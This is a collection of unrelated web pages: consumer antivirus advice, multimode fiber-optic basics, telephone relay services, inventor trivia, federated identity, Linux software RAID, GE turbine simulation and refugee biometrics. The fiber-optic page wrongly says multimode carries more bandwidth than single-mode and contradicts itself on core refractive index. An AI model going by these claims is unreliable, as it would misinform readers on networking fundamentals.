- Malware and virus removable: You need to make sure that your software will actually get rid of the malware as well as detecting it.
- Ransomware protection: This is one of the newest forms of malware, where the cybercriminals steal your important information and hold it ransom until you pay them off.
Antivirus and Antimalware on Mobile Devices
A common question, given the amount of time that we spend using our smartphones and tablets, is whether we can or should use antivirus or antimalware software on our mobile devices. The answer is not completely straight forward. If you use an Android or Google device, you can download software to protect your device from receiving a virus or other malware. If you use an Apple device, you cannot.
Apple states that its iOS is protected against malware and viruses well enough that more software is not warranted. They also do not allow you to download things onto your phone or device that could alter the operation of the device.
How Malware and Viruses Appear
We have spent a bit explaining how antivirus and antimalware software protects you from malicious activity, but we should also look at how the malware can get to you to begin with. There are many outlets that could lead to malware and viruses to infect your computer and devices. Malware architects are tricky and will use sneaky ways to get you to download malware onto your computer.
- Via email: One of the most effective ways of unwittingly receiving malware is through your email. What happens is you will receive an email from someone or something that looks familiar that has a file attached. The email will tell you that you need to open or download the attachment to receive whatever the email is offering. When you open the attachment, the malware will begin to download onto your computer. You can protect yourself against this by not opening emails from strange or unknown sources or if you receive an attachment that you were not expecting.
- Via removable drive: Another way that malware will make its way onto your computer is through an infected drive. This can be a flash drive or an external drive. When you connect the drive to your computer, the malware will be automatically installed. A good way to prevent this is to make sure your computer has autorun turned off so it will not automatically run malware when it is plugged in.
- Via websites: Sometimes a website will have been compromised and have malware ready to be downloaded onto your computer. If a site is requesting you install something or download something that does not make sense, it is a red flag that you should not allow it to download what it is trying to do. This is a big reason to have antimalware software installed on your computer; you can protect against surprise attacks.
- Via other software: There are instances when you are installing something on your computer, but there is malware that has been snuck into the software as a bundle. They could be disguised as an add-on, like something as simple as a toolbar or a program that looks harmless, but is actually infected. You can usually opt-out of the download and remove any add-ons that you wouldn’t want to begin with and just save yourself the unnecessary risk.
- Anything else: Really anything that can download onto your computer could contain malware or viruses, which is why you must have some kind of protection in place to ensure that you do not wind up with a compromised or infected computer.
One of the most essential things that you must remember once you have selected your antivirus or antimalware software is that you must keep it up to date. It is foolish to assume that once the software is installed that you are good to go.
Malware and viruses are an ever-changing thing and the software against them have to also be ready to evolve and change in order to ensure that you will be protected against the newest forms of malware as well as the malware that is already known about.
Cybercriminals are savvy and skilled as well as incredibly persistent in their endeavors. So as we get smarter in defenses, they look for new ways to cause harm. | <urn:uuid:00703e1d-60b8-483c-821e-2abc8df0270d> | CC-MAIN-2024-38 | https://bluegadgettooth.com/difference-between-antivirus-antimalware/ | 2024-09-07T13:45:57Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700650883.10/warc/CC-MAIN-20240907131200-20240907161200-00577.warc.gz | en | 0.968555 | 1,757 | 3.390625 | 3 |
Definition of Multimode Fiber-Optic Cabling in the Network Encyclopedia.
What is Multimode Fiber-Optic Cabling?
Multimode is a type of fiber-optic cabling that allows multiple signals to be transmitted simultaneously. Line drivers for multimode fiber-optic cabling use light-emitting diodes (LEDs) to generate the light signals that carry the data down the fiber.
How It Works
Multimode fiber, which has a glass core whose index of refraction varies with the distance from the core axis, is implemented in two main forms:
- Step-index multimode fiber: The light rays reflect off the walls of the core by total internal reflection. Depending on the angle at which the rays are incident on the surface of the core, different light paths are created that can carry additional signal bandwidth. In longer cables, these paths can get out of step with each other at the far end of the fiber and degrade signal quality.
- Graded-index multimode fiber: The core consists of concentric layers of material. Each successive layer has a lower index of refraction than the one that it envelops. As a result, rays of light travel along curved paths and all arrive in step with each other at the far end of the fiber.
Multimode fiber is available with different core diameters, typically 50, 62.5, and 100 microns. Multimode fiber can carry more bandwidth than single-mode fiber, but single-mode fiber can carry signals up to 50 times farther than multimode.
Read this recent article to learn more about types of optic fiber.
Multimode fiber is not recommended for long cable runs and should generally be restricted to runs of 914 meters. If this limit is exceeded, the light traveling along different paths through the fiber can produce a condition called modal dispersion, which results in parts of the signal arriving at unexpected times at the end station. This can degrade the quality of the signal or cause it to be unrecognizable.
Step-index fiber is cheaper than graded-index fiber and should be used only for shorter cable runs or where less bandwidth is required.
- AmazonBasics 10Gb 40Gb Multimode OM3 Duplex 50/125 OFNP Fiber Patch Cable LC to LC – 30 Meters
- 6 Fiber Indoor/Outdoor Fiber Optic Cable, Multimode, 62.5/125, Black, Riser Rated, Spool, 1000 Foot
- Gigabit Ethernet Media Converter, Single-Mode Dual SC Fiber, 1000Base-LX to 10/100/1000Base-Tx, up to 20km, Pack of 2
- 150 Meter 10Gb OM3 Multimode Duplex Fiber Optic Cable (50/125) – LC to LC – Aqua | <urn:uuid:b493c761-c2e9-483b-b389-9f3918893038> | CC-MAIN-2024-38 | https://networkencyclopedia.com/multimode-fiber-optic-cabling/ | 2024-09-12T11:34:28Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651457.35/warc/CC-MAIN-20240912110742-20240912140742-00177.warc.gz | en | 0.882958 | 580 | 3.15625 | 3 |
Telecommunications Relay Service (TRS)
Dial 7-1-1 or Special Toll-Free Numbers Listed in Your Telephone Directory
Telecommunications Relay Service is a free telephone service that allows persons with hearing or speech disabilities to place and receive telephone calls using standard telephone equipment or telephone equipment designed for individuals with disabilities. To use Relay dial one of the toll free numbers listed in your telephone directory, or simply dial 7-1-1. A specially trained Communications Assistant (CA) will answer your call and relay the telephone conversation between you and the party you are calling. All call information and conversations are confidential. Relay service is available 24 hours per day, 365 days a year. Long-distance calls placed for you can be billed to your existing long-distance service calling plan, collect, or with the use of a pre-paid calling card, carrier calling card, or third-party billing.
Types of TRS Calls
Computer (ASCII): users can access Relay Service by setting the communications software to the following protocols: speeds ranging from 300 to 2400 baud: 8 Bits, No Parity; 1 Stop Bit; Full Duplex. For speeds at or below
300 baud, follow the above using Half Duplex.
Hearing-Carry-Over (HCO): HCO allows hearing individuals with very limited or no speech capability to type his or her conversation for the Communications Assistant to read aloud to the hearing person. The HCO user hears the other party’s response. HCO requires a specially designed telephone.
Internet Protocal (IP) Relay: Connect to the relay using your computer or other web device. The Communications Assistant handles the call the same as a traditional relay call - “voicing” or reading everything you type to the other party - and typing everything the other party says for you to read on your screen.
Spanish Relay: Spanish speaking persons with a hearing or speech disability are able to make relay calls. This is not a translation service – both parties must speak Spanish, and at least one party must have a hearing or speech disability.
Speech-to-Speech (STS): STS allows a person who has difficulty speaking or being understood on the phone to communicate using his or her own voice or voice synthesizer. The Communications Assistant revoices the words of the person with the speech disability so the person on the call can understand them. No special telephone is required.
Text Telephone (TTY): Allows anyone who is deaf, hard of hearing or speech disabled to use a TTY to communicate with anyone using a standard telephone.
Video Relay Service (VRS): Allows natural telephone communication between Sign Language and standard telephone users. This service requires high-speed internet service such as DSL, cable modem, or mobile broadband modem.
Voice-Carry-Over: VCO enables people who have difficulty hearing on the phone to voice their conversations directly to the hearing person. The CA then types the hearing person’s response to the VCO user. (Requires a special telephone with text display.)
Voice/Standard Telephone: A hearing person may use a standard telephone to place a relay call and easily converse with a person who is deaf, hard of hearing or speech disabled.
Voice Over Internet Protocol (VOIP): VoIP customers can access the Telecommunications Relay Service (TRS) by dialing 7-1-1 or using the toll-free number listed in your telephone directory. | <urn:uuid:471fc636-4b84-4ee1-a9bf-888bf6f44496> | CC-MAIN-2024-38 | https://www.brightspeed.com/aboutus/legal/consumer/legal-notices/2024-annual-customer-rights.html | 2024-09-13T18:43:28Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651535.66/warc/CC-MAIN-20240913165920-20240913195920-00077.warc.gz | en | 0.907168 | 713 | 2.53125 | 3 |
Whether they are present in the classroom or logging on from home, it's challenging to keep students engaged in schoolwork. Often concentration on the lesson, IS the lesson!
Over the past decade, technology has greatly impacted education. From introducing new ways to interact with families and students, to lesson planning, organizing reports, managing and creating data, and more!
Every year schools, colleges, and universities welcome new students, and each year these new students result in the generation of a wide range of documents. From applications and admission forms, to report cards, attendance and behavior records, curriculum and financial aid documents, each needs to be properly processed, filed, and retrievable. Many of these documents are required by law to be kept for long periods of time.
Ever since the COVID-19 pandemic forced many companies to send their employees home to work, long-term remote work arrangements are now becoming commonplace.
Remote learning is becoming more and more popular – if not necessary – since the COVID-19 coronavirus pandemic. While many schools are opening fully, many educational institutions will be teaching online, or at least partially through remote learning.
Schools and educational institutions are under a lot of pressure to open safely despite the current COVID-19 coronavirus pandemic. Whether your school is reopening fully, or a smaller scale opening is in the works, containing viral spread is critical.
In 2020, the novel coronavirus COVID-19 completely disrupted all aspects of life, including education. | <urn:uuid:369b794d-bac3-480f-ad90-c36134e0f74f> | CC-MAIN-2024-38 | https://blog.dsinm.com/blog/tag/education | 2024-09-14T21:39:58Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651580.74/warc/CC-MAIN-20240914193334-20240914223334-00877.warc.gz | en | 0.961159 | 310 | 2.890625 | 3 |
These days, technology and invention go hand in hand. While they’re not synonymous, it would be hard to separate the two. Invention likely involves technology at varying levels of intricacy. While technology is constantly re-inventing itself in new ways that have a profound impact on the way we conduct everyday life. What is undeniably true is that inventors and technologists — past, present, and future — are the creative genius behind the very shape of the world we live in today and tomorrow.
May is not only National Inventors Month but it also houses the National Day of Technology, celebrated annually on May 11. This makes May especially important to us at Hitachi Solutions.
Hitachi Ltd. — our parent company — was founded by a young Japanese inventor named Namihei Odaira more than 100 years ago. Though an electrical engineer by trade, Odaira had a passion for the possibilities. A true pioneer, he valued imaginative thinking as well as the people who worked for him.
Hitachi Solutions today employs people who are constantly iterating to improve upon the good to make it better. It is the big-picture see-ers, creative differentiators, and pioneering doers that innovate and build the very solutions that enable our customers to continue to thrive in the ever-evolving landscape of technology.
Can we create it, build it, and fix it? Of course, and yes, we can! There are so many ways in which we help our customers achieve their goals — often through innovations, solutions, and managed services that run seamlessly in the background. To learn more about how we leverage our capabilities to help our customers, visit our website!
As a shout-out to the mighty — but possibly overlooked — heroes of innovation and discovery, here is a fun list of lesser-known but important invention facts!
Did you know?…
- Invented back in 1845, Dr. Horace Day invented tape. Applying a sticky substance to strips of fabric, Dr. Day developed the first ever surgical tape — which became the father of all tape. ALL tape? Yep. Big tape, little tape, wide tape, tall tape, Scotch tape, packing tape, double-sided-stick tape, and even alien tape!
- Seeing a need for something other than corncobs and seashells, Joseph Gayetty first patented toilet paper in Western countries in the 1850s. Known as “Medicated Paper for the Water Closet,” it was not widely used until the early 20th century. Wait…what?
- It’s not a problem at all! The NoseFrida, the new and improved version of the “snot sucker,” the aspirator bulb, used to clear a baby’s stuffy nose was invented by Swedish ear, nose, and throat doctor Frida Sångberg in the 1990s. First marketed in Sweden in 1997, it made its way to the United States in 2006 when Chelsea Hirschhorn founded FridaBaby and began distributing the product.
- For all of you who have been a victim of lunch theft, fear not. The Fake Mold Lunch Bag, invented by Sherwood Forlee in 2009, is here to thwart any sandwich thief’s diabolical plans to keep you hungry!
- In 2015, Lowell Wood, a close colleague of Bill Gates, received his 1,085th utility patent making him the first inventor to surpass Thomas Edison’s record of 1,084. Wood — known as one of the most influential physicists of his generation — has been honored with the Edward Teller Medal and the National Medal of Technology and Innovation. He currently holds 5,125 U.S. patents.
- The first LOLcat photograph didn’t start with icanhascheezburger. It actually dates back to 1903 when Harry Whittier Frees started photographing his cat, dressed up in doll clothes, and adding captions like “What’s Delaying My Dinner?”.
- You know it. We know it. Burnt toast sucks. Lucky for all of us, in 2015 James Stumpf began socializing his invention — the Glass and Bamboo Toaster. Charred wheat, multigrain, and white bread may very well be a thing of the past!
- 8. Who hasn’t paused before dropping uncooked noodles into that boiling pot of water, wondering just how many noodles will equate to the right amount? Well, the Spaghetti Measuring Tool removes the belabored guesswork! Invented by Stefán Pétur Sólveigarson from Iceland, this tool measures out your pasta portion for you via creative cutout shapes!
Hitachi Solutions’ mission is “To contribute to society through the development of superior, original technology and products”. Join us this month of May in celebrating the accomplishments of inventors and technologists from all over the world that have done just that!
And, if you are interested in how our innovative spirit and proven achievements help customers just like you harness the benefits of Microsoft business applications and technologies, connect with us! | <urn:uuid:9c0bdeb3-3bca-4b99-8459-0c042d5ef8f5> | CC-MAIN-2024-38 | https://global.hitachi-solutions.com/blog/celebrating-technology-and-innovation/ | 2024-09-17T07:46:13Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651750.27/warc/CC-MAIN-20240917072424-20240917102424-00677.warc.gz | en | 0.956362 | 1,067 | 2.859375 | 3 |
What is Federated Identity Management?
Federated Identity Management, or FIM, occurs when two or more trusted domains allow their users to use the same digital identity to access applications across domains. This will enable users to move between multiple sites securely.
Why Is Federated Identity Management Important?
Users have dozens and dozens of accounts spread across professional, personal, and public services. Accordingly, they also have dozens of separate digital identities used to authenticate them across these services. That’s a problem from both user experience and security perspectives:
- Users notoriously have a hard time remembering passwords, usernames, PINs and so on. While requiring unique credentials is an obvious security step, users tend to forget passwords or express frustration when they have to create a new account for a new service.
- Following that poor user experience, many users simply use easy-to-remember passwords or reuse passwords across multiple sites, which means that it’s much easier for their credentials to be compromised and, in turn, compromise various platforms.
A federated identity attempts to solve this problem by securely using a single user across multiple domains. Federation is the practice of “federating” (or connecting) different authentication systems through a set of agreements and standards across multiple platforms so that users can provide one set of credentials to access numerous other accounts.
To facilitate this kind of interoperability, authentication systems use FIM solutions that provide a way for these platforms to share a common identity authentication language.
To create a secure and effective system that can be shared across platforms, designers often adhere to what is known as the “Seven Laws of Identity.” Created by Microsoft Chief Identity Officer Kim Cameron in 2005, these laws were conceived to refocus authentication as a user-focused endeavor while creating a “metasystem” or identity layer that helps control, authenticate and protect digital authentication and verification information.
The seven laws are the following:
- User Control and Consent: Any system must put the user in control of their digital identity, including how they are used and how information is released. Additionally, the system must protect the user against deception and identity theft.
- Minimal Disclosure for a Constrained Use: The only information collected will be the minimum needed for the purposes of authentication or authorization. Likewise, any system that collects information can deter attacks if it adheres to minimal data principles.
- Justifiable Parties: An access solution makes the user aware of requesting information and policies about data use.
- Directed Identity: A system must support Omnidirectional identification for public spaces and unidirectional identification over private connections, like Bluetooth.
- Pluralism of Operators and Technologies: An overarching system must operate with multiple technologies.
- Human Integration: An identity metasystem should put human users at the forefront with unambiguous human/machine communication that protects against attack or theft.
- Consistent Experience Across Contexts: The user experience must be consistent and straightforward through multiple operators.
A federated system would therefore attempt to follow these rules. For example, the ability to use your Google account to log into a mobile phone application relies on several of these rules just to authenticate a user.
Federated Identity and Single-Sign-On
FIM sounds similar to other management approaches, most readily Single Sign-On (SSO). These technologies function, on the surface, in the same way in that they seemingly support a more straightforward way to consolidate authentication and verification. There are, however, differences, the most significant of which is the scope of application.
SSO functions within an organization. That is, SSO can support IAM across systems, resources or devices within a single system. Within the authentication system of a given infrastructure, SSO can streamline authentication in a single set of credentials.
FIM, however, creates a standard by which diverse applications across different organizations can support single-identity authentication. FIM uses common protocols and languages to build a trusted management service between these organizations. Some of the standard protocols that you will see used to create FIM systems are:
- Security Assertion Markup Language (SAML), which allows providers to exchange authorization credentials between different service or application providers.
- OAuth, a delegation framework used for authorization between different organizations fielding applications through HTTPS or APIs.
- OpenID Connect, an authentication protocol that extends OAuth by adding an identity later for more control over digital identity and authentication.
Costs and Benefits of Federated Identity Management
Unsurprisingly, FIM has several advantages and disadvantages associated with its implementation.
Some of the benefits include the following:
- Streamline Authentication: Perhaps the most obvious benefit is that you make it easier for users to log in to your system. If you’re running an online app, this can break down resistance from potential users who might not want to create yet another account for another app.
- Security: With FIM, you are leveraging an identity layer to centralize security for your authentication system. In practice, this means that you can rely on another secure provider (like Google or Facebook) to verify identities that you know you can trust. Additionally, you potentially reduce the drive for users to use simple or redundant passwords that could compromise your systems.
- Reduce Administrative Overhead and Cost: If you trust another provider like Google to store and verify information, you remove the need to manage your own systems or keep user credentials.
While these are incredible advantages, it’s also essential to understand some of the challenges as well:
- Trusting Other Identity Platforms: In an FIM system, you must trust that when a user provides credentials from another participating organization, you have to trust that the member has proper security, policies and protocols in place. If not, they could introduce vulnerabilities that you can’t detect until it is too late.
- Implementing Different Rules: Being part of an FIM system also means meeting minimum requirements regarding identity management and security. If you aren’t prepared for that, it could be a costly endeavor.
- Forcing Trust With Other Organizations: Speaking of trust. If you are in an FIM system, then there are expectations beyond the bare minimum of protocols. If you have a history of neglecting user privacy, not protecting data, or other unpopular security and customer approaches, you might find it hard to partner with others.
Use Cases for Federated Identity Management
One of the clearest use cases for FIM is Google services. Not only does Google use federated identity to support authentication across other sites, but it also offers ways for enterprise users to build cloud services that can also enter into FIM partnerships with other organizations. This way, if you use Google Cloud for professional reasons, you can federate identity to make access easier for outside users.
Federated identity is also used in several other contexts. For example, a university with wireless Internet access can use FIM to offer Wi-Fi access not only on campus but also with other partner institutions. This way, students and faculty can enjoy Wi-Fi at any partner location with a single set of credentials.
In all cases, you’ll see FIM used in three major cases:
- Inbound Federation: Allows you to provide federated access to your application or resources to individuals outside your organization.
- Outbound Federation: Allows you to provide access to external applications to the identities that you manage within your organization.
- Bring Your Own Identity: Allows users to access resources or applications across multiple organizations using a single set of credentials supplied and stored by an Identity Provider.
1Kosmos BlockID: Why Federated Identity Management Critical for Modern Authentication
Modern authentication is improving incrementally, but that isn’t enough. With the severity and frequency of breaches occurring daily, it’s more important than ever to bring a robust and secure authentication method that can radically change how we log in to systems, devices and user accounts.
BlockID innovated authentication by focusing on two aspects of digital identity:
- Passwordless authentication with decentralized identities and
- Streamlined user experience
Federated identities and SSO are essential steps in the path to strong authentication, but it isn’t enough. That’s why BlockID uses secure blockchain technology to create decentralized identities that protect user identities, provide the benefits of SSO and FIM and give power and control back to the user—some of the core tenets of the rules we articulated above.
Alongside this approach to identity verification, 1Kosmos also includes several critical features:
- KYC compliance: BlockID Verify is KYC compliant to support eKYC verification that meets the demands of the financial industry.
- Strong compliance adherence: BlockID meets NIST 800 63-3 for Identity Assurance Level 2 (IAL2) and Authentication Assurance Level 2 (AAL2).
- Incorruptible Blockchain Technology: Store user data in protected blockchains with simple and secure API integration for your apps and IT infrastructure.
- Zero-trust security: BlockID is a cornerstone for a zero-trust framework, so you can ensure user authentication happens at every potential access point.
- Liveness Tests: BlockID includes liveness tests to improve verification and minimize potential fraud. With these tests, our application can prove that the user is physically present at the point of authentication.
If you’re ready to learn about BlockID and how it supports streamlined authentication, read about how you must Go Beyond Passwordless Solutions. Also, make sure you sign up for the 1Kosmos email newsletter for updates on products and events. | <urn:uuid:886d5880-032e-4682-8860-0ab891999089> | CC-MAIN-2024-38 | https://www.1kosmos.com/digital-identity-101/identity-management/federated-identity-management-fim/ | 2024-09-17T08:41:33Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651750.27/warc/CC-MAIN-20240917072424-20240917102424-00677.warc.gz | en | 0.918329 | 1,983 | 3.21875 | 3 |
Welcome to our howto on implementing Linux software RAID with no expense other than however many hard disks you wish to use, whether they be inexpensive ordinary PATA (IDE) drives, expensive SCSI drives, or newfangled serial ATA (SATA) drives.
RAID (define) is no longer the exclusive province of expensive systems with SCSI drives and controllers. In fact it hasn’t been since the 2.0 Linux kernel, released in 1996, which was the first kernel release to support software RAID.
What RAID Is For
A RAID array provides various functions, depending on how it is configured: high speed, high reliability, or both. RAID 0, 1, and 5 are probably the most commonly used.
Endless debates rage over which offers superior performance, hardware or software RAID. The answer is “it depends.” |
RAID 0, or “striping,” writes data across two or more drives. RAID 0 is very fast; data are split up in blocks and written across all the drives in the array. It will noticeably speed up everyday work, and is great for applications that generate large files, like image editing. It is not fault-tolerant — a failure on one disk means all data in the array are lost. That is no different than when a single drive fails, so if it’s speed and more capacity you want, go for it.
RAID 1, or “mirroring,” clones two disks. Your storage space is limited to the size of the smaller drive, if your two drives are not the same size. If one drive fails, the other carries on, allowing you to continue working until it is convenient to replace the disk. RAID 1 is slower than striping, because all writes are done twice.
RAID 5 combines striping with parity checks, so you get speed and data redundancy. You need a minimum of three disks. If a single disk is lost your data are still intact. Losing two disks means losing everything. Reads are very fast, while writes are a bit slower because the parity checks must be calculated.
You may use disks of different sizes in all of these, though you’ll get better performance with disks of the same capacity and geometry. Some admins like to use different brands of hard disks on the theory that different brands will have different flaws.
What RAID Is Not
It is not a substitute for a good backup regimen, backup power supplies, surge protectors, and other sensible protections. Linux software RAID is not a substitute for true hardware SCSI RAID in high-demand mission-critical systems. But it is a dandy tool for workstations and low- to medium-duty servers. PATA (or IDE) drives (define) are not hot-swappable, but you can set up an array with standby drives that automatically take over in the event of a disk failure. If you don’t want to use standby drives your downtime is limited only to the time it takes to replace the drive, because the system is usable even while the array is rebuilding itself.
Hardware RAID controllers come in a rather bewildering variety. Mainboards come with built-in IDE RAID controllers, and PCI IDE RAID controller cards can be had for as little as $25. Most of these are like horrid Winmodems, in that they require Windows drivers to work and have Windows-only management tools. I wouldn’t bother with IDE RAID controllers — Linux software RAID outperforms them in every way, and costs nothing.
A true hardware RAID controller operates independently of the host operating system. You’ll find a lot of choices for SATA (define) and SCSI drives. SATA controllers cost from $150 to the sky’s the limit, depending on how many drives they support, how much onboard memory they have, and other refinements that take the processing load away from the system CPU.
Good SCSI controllers start around $400 and have an even higher sky. Both SATA and SCSI controllers should support hot-swapping, error handling, caching, and fast data-transfer speeds. A good-quality hardware controller is fast and reliable; but finding such a one is not so easy. Many an experienced admin has lost sleep and hair over flaky RAID hardware.
Something to keep in mind for the future – as SATA support in Linux matures, and the technology itself improves, it should be a capable SCSI replacement for all but the most demanding uses. (For more information see the excellent pages posted by the maintainer of the kernel SATA drivers, Jeff Garzik.)
Continued on page 2: Software RAID Advantages
Software RAID Advantages
Linux software RAID is more versatile than most hardware RAID
controllers. Hardware controllers see each drive as a single member of
the RAID array, and handle only one type of hard disk. Most hardware
controllers are picky about the brand and size of hard disk — you can’t
just slap in any old disks you want, but must carefully choose
compatible disks. And it’s not always documented what these are.
Linux RAID is a separate layer from Linux block devices, so any block
device can be a member of the array — a particular partition, any type
of hard drive, and you can even mix and match. Endless debates rage
over which offers superior performance, hardware or software RAID. The
answer is “it depends.” An old slow RAID controller won’t match the
performance of a modern system with a fast CPU and fast buses. The
number of drives on a cable, the types of drives and cabling, the speed
of the data bus- all of these affect performance in addition to the
speed of the CPU and the demands placed on it.
One disadvantage is hot-swap ability is limited and not entirely
Converting An Existing System To RAID
First of all, your power supply must be capable of powering all the
drives you want to run on the system. Adding as many drives as you want
is easy and inexpensive. If you’re going to purchase new hard disks,
you might as well get SATA, because the cost is about the same as PATA.
SATA drives are faster and use less cabling, and will soon supplant
PATA drives. PCI controller cards for additional PATA and SATA disks
cost around $40, and will run two disks each. The built-in IDE channels
on mainboards can handle two disks each, but you should run only one
disk per channel. You’ll get better performance and minimize the risk
of a fault taking out both hard disks.
Next, install the raidtools2 and mdadm packages. If you
want your RAID array to be bootable, you’ll need RAID support built
into the kernel. Or use a loadable module and use an initrd
file, which to me is more trouble than rebuilding a kernel. Tomorrow
in Part 2 we’ll cover how to do all of this. You may get a head start
by consulting the links in Resources.
- Linux-raid mailing list
- The Software-RAID HOWTO
- Chapter 10 of the Linux Cookbook, “Patching, Customizing, and Upgrading Kernels”
Article courtesy of EnterpriseNetworkingPlanet | <urn:uuid:ec84e2fd-2490-44f9-adc6-e946a14ac0f0> | CC-MAIN-2024-38 | https://www.enterprisestorageforum.com/hardware/raid-faster-and-cheaper-with-linux/ | 2024-09-18T14:04:43Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651899.75/warc/CC-MAIN-20240918133146-20240918163146-00577.warc.gz | en | 0.926411 | 1,531 | 2.9375 | 3 |
AI systems for problem solving, including Cognitive Computing systems, require a base collection of knowledge or corpus. The corpus is a digital representation of all that is known about a particular domain, such as all the works of Shakespeare, or all of the defining characteristics of disorders that are codified in the Diagnostic and Statistical Manual of the American Psychiatric Association. This knowledge must be represented in a consistent form to allow the system to use it to draw inferences and make decisions, and to be able to update the corpus when appropriate.
The data required for corpora in some domains, such as medical diagnostics, insurance claim codes, and regulatory filings, are already available in text form from government and professional association sources. Packaging this data for use by AI/cognitive systems—with or without additional metadata—is a natural extension to the conventional content publishing model and is in progress for several domains.
Common knowledge—the data that helps us interpret natural language in context—has utility across industries and is generally more difficult to codify. The Cyc knowledge base, which contains over 630,000 concepts with 38,000 types of relationships, has been in development for decades and is now commercially available. Open source projects like WordNet, which catalogs words, synsets, and senses in English, can give application developers a jumpstart on building robust solutions with natural language capabilities.
Representative Vendors and Projects: Cognitive Scale, CyCorp, and WordNet. | <urn:uuid:29542c0d-bab0-45b2-908d-08eaf6b6e2ef> | CC-MAIN-2024-38 | https://aragonresearch.com/glossary-knowledge-libraries/ | 2024-09-07T18:42:33Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700650898.24/warc/CC-MAIN-20240907162417-20240907192417-00677.warc.gz | en | 0.931392 | 295 | 3.03125 | 3 |
Hyperion Research has published a new case study on how General Electric engineers were able to nearly double the efficiency of turbines with the help of supercomputing simulation.
HPC plays a critical role because its computational horsepower can solve the equations used to
represent key physical behaviors. Also, the large memory capacity of an HPC system is needed to
store the models of the geometries and boundary conditions of the physical systems. It is also
essential to create the visualization of the simulation results used by GE engineers to better
understand what is happening inside the gas turbine generators.
Understanding physical behaviors in harsh environments is extremely hard, and at times, critically important. That is the situation General Electric (GE) engineers faced when designing their new heavy-duty gas turbine generator. Gaining even 1% greater efficiency could save their electric utility customers millions of dollars and improve GE’s world-wide competitiveness. The key issues involved a better understanding of the fluid dynamics and reactive flow behaviors in the turbine’s 1,500 degree Celsius combustion chambers and the interactions between the 2 to 16 individual flames in the chambers. GE Power engineers had reached the limits of theory and experiments, motivating them to apply advanced modeling and simulation.
When the engineers at the GE Power division realized that their traditional approaches to designing
heavy-duty gas turbine generators were insufficient, they turned to the GE Global Research
computational combustion lab. In turn, the combustion lab approached Oak Ridge National
Laboratory (ORNL) and Cascade Technologies. By using the Titan supercomputer at the ORNL
Computational Leadership Facility (OLCF), researchers adapted and applied the CHARLES code to
understanding the complex physics found inside a gas turbine. This involved creating a nearly billion
cell mesh to run simulations on 8,000 to 16,000 Titan processor cores.
With these advanced modeling and simulation capabilities, GE was able to replicate previously observed combustion instabilities. Following that validation, GE Power engineers then used the tools to design improvements in the latest generation of heavy-duty gas turbine generators to be delivered to utilities in 2017. These turbine generators, when combined with a steam cycle, provided the ability to convert an amazing 64% of the energy value of the fuel into electricity, far superior to the traditional 33% to 44%. | <urn:uuid:632bd0bf-5c91-47a2-88e4-f963b21e2e29> | CC-MAIN-2024-38 | https://insidehpc.com/white-paper/understanding-behaviors-extreme-environment-natural-gas-turbine-generators/ | 2024-09-07T18:41:07Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700650898.24/warc/CC-MAIN-20240907162417-20240907192417-00677.warc.gz | en | 0.928029 | 466 | 3.140625 | 3 |
Salvation requires good logistics. The refugee camp that functions well is one built with security, sanitation and a good supply of food and drinking water in mind from the very start. Before that can happen, however, there needs to be a precise understanding of how many people need to be supported. Only then can refugee agencies, border officials and charity workers begin to reckon with the immense challenges posed by feeding and housing thousands of traumatised individuals and families displaced by flood and famine, war and pestilence. Increasingly for humanitarian aid agencies, the best method of ascertaining this number lies in data collection through biometrics.
By scanning unique biometric identifiers like fingerprints, faces or irises, officials can begin to build a numerical picture of the transit camp that avoids unnecessary duplication and create a new, official identity for individuals untethered to the government documents of the nations they have fled.
Over time, this can also allow migrants to begin accessing services within the host country while protecting them from fraud. Such has been the case in Cameroon, which hosts some 6,000 refugees from the civil war in the neighbouring Central African Republic. “In the far north, north-west and south-west regions, resources are spent on addressing insecurity, which leaves less money for basic social services,” explains Kathleen Ndongmo, a member of the Africa Digital Rights Network based in Cameroon. A campaign in August to enrol thousands of refugees into a biometric ID card system, says Ndongmo, was a straightforward way for the government and UNHCR, the UN refugee agency, to allow refugees to move “freely without fear of arrest, go to school, access health and financial services, and obtain a mobile phone subscription.”
Even so, it’s a safety net with large gaps. While refugees have the power to withhold consent to having their biometric data collected, Ndongmo has heard of reports that migrants have not been empowered to understand Cameroon’s data protection regulations. It’s all the more concerning, she adds, given the security risks inherent in retaining biometric data. “Despite the fact that advances in technologies can help humanitarian agencies scale up and deliver aid more efficiently and effectively, mass-scale collection and use of refugees’ sensitive biometric data for identification and authentication is concerning,” says Ndongmo.
That leaves it, in large part, up to the collecting agency to decide what data protection regime is best to keep refugees’ biometrics safe. It’s a position that can be abused. In 2021, news emerged that the biometric data of thousands of Rohingya refugees collected by the UNHCR was shared, inexplicably, with the government of Myanmar – the very institution they fled in the first place. For Dr Petra Molnar, a research fellow at Harvard’s Berkman Klein Centre for Internet & Society, the scenario is indicative of vast power imbalances between refugee agencies and those they are meant to care for that, in time, may lead to migrants becoming unwilling test subjects for a whole range of biometric enrolment technologies.
“I don’t know if I would go as far as to say that biometrics can never be positive,” says Molnar. “But… we’re dealing with a reality that is extremely weighted against the people who are moving.”
Informed consent in biometric data collection
Agencies like the UNHCR have collected biometric data for decades in the form of fingerprints, explains Kerrie Holloway, a senior research officer at the ODI, formerly known as the Overseas Development Institute. For years, these prints formed the ideal biometric record – “unless,” she says, “you cut your fingers off, you’re kind of stuck with it” – but recently this identifier has gradually given way to more exotic variants like voice samples (used to authenticate mobile money transfers in Somaliland), gait recognition (tested on disabled Rohingya migrants in Bangladesh), and facial recognition (used to help refugees find loved ones lost in the aid system.)
Iris scanning has proven especially popular. Such data collected from the almost 40,000 refugees housed at the UNHCR’s camp at Azraq in northern Jordan is used not only to collate the number of individuals at the facility, but also to facilitate cardless payments at ATMs outside the facility using the agency’s EyePay service. “The system,” writes UNHCR, “helps to enhance the efficiency and accountability of food assistance, while also making shopping easier and more secure for refugees”.
